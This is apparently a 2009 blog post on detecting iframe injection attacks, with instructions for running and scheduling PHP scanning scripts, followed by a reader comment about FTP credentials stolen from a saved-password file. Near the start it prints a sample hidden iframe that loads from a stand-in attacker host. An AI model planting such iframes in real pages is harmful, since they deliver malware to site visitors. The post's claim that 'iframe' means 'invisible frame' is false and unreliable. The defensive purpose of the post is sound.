Tuesday, October 13, 2009

Measures to Prevent and Detect iFrame Injection Attacks

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:

iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden" /iframe

The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The “i” in “iframe” stands for “invisible”, i.e. “invisible frame”.) IFrames are used on thousands and thousands of sites, because that’s what Google uses for its AdSense ads — the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.

Like most useful things, iFrames can be used for good or for bad.

An iframe injection is an injection of one or more iframe tags into a page’s content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor’s system.

Typically, all your index.* files in your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:


The intent of this article is to show what preventative measures you can use to prevent or detect iframe injection attacks to your website.


The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:


Before you use the link, you need to replace "yourdomain_name" with your actual website name.

Google will tell you if your website is suspicious or not.

You can also go to the following website and enter your "www.yourdomain_name/". It will advise you on your website status.



If you have suffered an iframe injection attack you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave way for more sophisticated attacks. Google will mark your site in it’s search results with a warning: “This site may harm your computer”. If a visitor sees the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again and your traffic will go down to zero.

I suggest that you read the article "Website Protection Against iFrame Injections" which you can find in this Blog.


If you have not suffered and iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.

One script you can use is called "clean.php" which you can download at:


Copy and paste this script into your text editor, such as notepad, and save the file as "clean.php"

It is important to remember that when you create a web page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.

Before you can use the file, you need to change the following line in the script:

$webpath ="Type your domain name here. Eg:http://www.diovo.com/"

which will become:

$webpath ="http://www.yourdomain_name/

Where "yourdomain_name" is replaced with your actual domain name.

In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.

When you have pasted the above script into your notepad editor, made the change for your website name, save it as “clean.php”. Once you have saved the file, upload it to the root directory of your website.

Now you need to create a URL that you will copy and paste into your browser as follows:


where "yourdomain_name" is replaced by your actual doamin name.

The web page to be checked is given by “s=index.php” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.php injections.

Since we also want to check our index.html type web pages, we create a different URL as follows:


The file to be checked is given by “s=index.html” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.html injections.

The URL will list all the ”index.php” or "index.html" files in your website and if any of the files contains the given string, it will print the part with the string. You can see that one file is infected by displaying the iframe script.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So you will have to clean the files manually by deleting the iframe script.

You should be able to see that you can use the “s” parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:


You can thus create simple internet URL shortcuts that you can click on to check the required web pages.

When the script tests for iframe injections, it is basically looking for the text "iframe" and so will display any web page that has the text "iframe". You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.

The "clean.php" iframe injection tool is quite useful when testing individual pages. However, after your website starts to grow, you will need to have a URL link for every web page extension (ext) which starts to be a time consuming effort, having to check each individual web page for iframe injection.

A website that gives a free script to test all the files on a website for iframe injection is given at the following link:


The file is called "detect-signature.php"

When you have dowloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.

Using your notepad editor, open the file. First locate the following line:

define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types

You will see that the file will ignore files with extensions jpg, pdf, zip, etc. You can add or delete files as you feel necessary.

Next, locate the following line:

define("IGNORE_BEFORE", strtotime('2009-08-01') );

The file will ignore any web pages created before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.

You will be downloading the “detect-signature.php” as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.

To activate, you need to create the following URL for your domain:


You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for “yourdomain_name”.

When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.

Once the scan is complete, you have two more options you can use for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). You can continuously click on any of the three links on the web page scan results.

When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.

What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benifit as they might also be attacked. Just make sure that when ever you do find an iframe injection, it is really a malicious iframe.


Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.

The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:


Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour.As mentioned previously, there are three ways to run the file. We can check and display all files, check and display only errors, or, check and display errors only. The error is the iframe injection. We will use the 3rd option so we will need to use the following URL in the System Scheduler:


When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.

We will now schedule the file. Open System Sceduler. Select the "Action" menu and then select "New Event", You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In "State" box, select Maximized.

We now need to scedule when we want to run the scan. Select the "Scedule" tab. For "Scedule Type, select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to "Action" menu and Save and Exit. You should see the System Schedule icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.

Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.

You do not have to run every hour on the hour. You can select what ever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.

To help things be a bit clearer, I added the date and time in the "detect-signature.php" file so I knew the exact date and time, the scan was made. You can search the internet for java script that you can add. It is very easy to do and will give order to your scanning.


If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.

Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.

1 comment:

  1. I had a massive iframe insertion attack on many of my websites yesterday.
    All attacks originated from IP and used ftp acces to the various servers.

    After careful inspection I discoverd that only those sites were hacked that had "Save Pwd" checked in WS_FTP. So someone seems to have stolen my:
    C:\Program Files\WS_FTP\WS_FTP.ini
    which contains all saved passwords in a simply decodable unsafe format.

    It is still a miracle how the hacker got access to that file. I have ESET Smart Security and it sees nothing suspicious.

    NEVER use the "save Pwd" option in WS FTP, uninstall WSftp and use a secure ftp client in stead.